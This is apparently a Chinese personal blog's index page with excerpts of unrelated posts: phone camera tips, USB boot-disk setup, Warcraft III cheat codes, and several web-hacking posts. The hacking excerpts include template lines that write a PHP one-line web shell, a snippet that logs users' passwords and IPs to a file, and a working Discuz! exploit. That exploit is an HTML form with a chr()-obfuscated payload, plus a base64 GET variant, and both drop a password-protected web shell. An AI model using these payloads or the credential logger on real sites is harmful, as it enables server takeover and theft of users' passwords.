Chinadu`s Blog

by flyh4t
team: http://www.80vul.com
date: 2010-01-10

测试版本MyBB 1.44.11

[一]漏洞分析

在index.php文件336行左右代码如下：

//index.php,336行左右

$plugins->run_hooks("index_end");
//出现了eval函数，注意参数
eval("$index = "".$templates->get("index")."";");
output_page($index);

看以下eval()函数中的内容是否可以控制，继续找到templates类查看get函数的定义:
阅读全文...

一直在测试5800的各项功能，也遇到了网友说到的一些问题，包括照相问题，在没有任何设置的时候拍下一张照片，非常难看，很模糊，一开始以为是5800自带相机问题，还有的人说5800相机水准不行，经过我的测试，不是这样的，只是我们不会用5800相机而已，其实5800不同于我们以往用的手机拍摄，一键搞定，5800拍照需要很多设置，我要教大家的是如何去设置，这些设置都有什么用。如果你明白了，肯定是会拍出清晰的照片。
1.如何进入设置?哪些个设置重要?哪些个设置不需要动,影响不大.

阅读全文...

1、下载HP_USB_FW.rar，This tool can setup a booting USB flash disk。他可以创建dos的引导程序到U盘里面。下载后解压，执行HPUSBFW.EXE，选FAT32文件系统，快速格式化，要选中创建dos启动 盘，路径指向解压目录下的HPUSBFW目录，这个目录下有引导程序COMMAND.COM、IO.SYS、MSDOS.SYS，这3个文件在格式化完成 后被copy到移动硬盘跟目录下。

阅读全文...

编辑模板的时候写入这几行,拆开写一句话,就行了:

1. <!--{eval $content = "@eval($_POST[c])";}-->

2. <!--{eval $test1 = "<"."?"."php ".$content."?>";}-->

3. <!--{eval fputs(fopen(S_ROOT.'./templates/default/model_cache.php','w+'),$test1);}-->

PS:引用一句俗话：“外行看热闹，内行看门道” 雷死人了。

注意看镜头中的system32目录中dir命令，完全受捕鸟啦，主角太高端啦。

1.输入-ars+开启英雄自动无限重生
同理输入-ars-关闭英雄自动无限重生

开启后 英雄死后会立即在原地复活

2.-uci
一些ID:
stel 传送权杖
stwp 回城
spre 保存权杖
ankh 重生十字架
srrc 复活卷轴
modt 死亡面罩
hbth 战舰之舵(太强了)
gemt 显形宝石
gsou 灵魂宝石(太BT了 最好不要乱用啊 尤其是RPG)
rnsp 残废之球
odef 黑暗之球
ofro 霜冻之球
sora 影子之球
oslo 减速之球
oven 毒液之球
ofir 火焰之球
ocor 腐蚀之球
oli2 都是闪电之球
fgrd 红龙卵
rde1 速度之锤
mlst 力量之锤
sksh 邪恶护盾
flag 胜利旗帜(人类)
nflg 胜利旗帜(暗夜)
oflg 胜利旗帜(兽族)
uflg 胜利旗帜(不死族)
ckng 国王之冠 +20
ratf 无极战斧
rde4 无极护盾
rat6 无极战弓
prvt 无极权杖
evtl 闪避护符
spsh 魔法护盾护身符
3.显示所有玩家信息

输入-list

4.魔免

选定单位
在单位特殊属性菜单设置(也可用删除所有特殊属性去掉)

输入-umm也可开启 删除也可以-umm-

5.加钱

输入-rm 钱数
输入-rw 木头数
如果想减少 空格可以换成-
例子:
加200钱:-rm 200
减50木头:-rw-50

6.升级

选定英雄 按住←→再按↓

输入-hu 级别
比如输入-hu 2 升级2
空格换成-可以减去等级

加力量
(对选中英雄)
1.按键盘↑+←(间隔2s内)

2.输入-hl 数值
(空格换成-可以减去)
例子:
加20力量:-hl 20
减力量5:-hl-5

(对选中英雄)
1.按键盘↑+↓(间隔2s内)

2.输入-hm 数值
(空格换成-可以减去)
例子:
加20敏捷:-hm 20
减敏捷5:-hm-5

加智力
(对选中英雄)
1.按键盘↑+→(间隔2s内)

2.输入-hz 数值
(空格换成-可以减去)
例子:
加20智力:-hz 20
减智力5:-hz-5

加三围
(对选中英雄)
1.按住键盘↑↓再按→

2.输入-ha 数值
(空格换成-可以减去)
例子:
加20三围:-ha 20
减三围5:-ha-5

7.开地图

(只会自己开 不会对盟友共享[盟友看见是正常视野])
1.连按5次↑(2s内)

8.自动清除CD

在自动化菜单设置

输入-acd+开启自动清除CD
同理输入-acd-关闭自动清除CD

内容如下：

$ip=$_SERVER['REMOTE_ADDR'];
$showtime=date("Y-m-d H:i:s");
$record="".$username." --------".$password." IP:".$ip." Time:".$showtime."\r\n";
$handle=fopen('./ipdata/csshacklog.php','a+');
$write=fwrite($handle,$record);

修改uc_client目录下的client.php 在

阅读全文...

1.注册一个新用户
2.Exp代码如下：

<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">

帖子ID，指定一个存在的帖子即可：<input type="text" name="tid" value="1" />

<input type="hidden" name="action" value="imme_binding" />

<input type="hidden" name="response[result]" value="1:2" />

<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).

chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).

chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).

chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).

chr(99).chr(104).chr(101).chr(47).chr(117).

chr(115).chr(101).chr(114).chr(103).chr(114).

chr(111).chr(117).chr(112).chr(95).chr(48).

chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).

chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).

chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).

chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).

chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).

chr(91).chr(99).chr(109).chr(100).chr(93).

chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />

<input type="submit" name="topicsubmit" value="提交" class="submit" />

</form>

chr解码后是：

value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

保存html

打开点提交，会生产forumdata/cache/usergroup_01.php一句话文件，密码是cmd

第二种方法：

直接GET，利用语句：

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),

base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法：

在common.inc.php上面加上

$response=$scriptlang=array();

官方发布修补补丁：

http://www.discuz.net/thread-1537673-1-1.html

来自：digexploit

作者：lcx

这期的专栏是我设定的题目，看够了注入，是不是想了解一下内网的入侵手法呢？做为出题人，自然要写一篇了。在各式各样大小不同的内网中，最常见的就 是域内 网了。其实域内网的入侵和我们平常的入侵手法在总体上来讲的逻辑也是一样，也是信息的收集、分析，找出薄弱点，然后击破，再综合归纳整理，最终拿到域管理 员的密码，算是大功告成。有了内网的第一台机器的权限后，如何收集信息，这是很关键的一步，这篇文章讲的就是域内网信息的收集的第一步。

图1（点击查看大图）

阅读全文...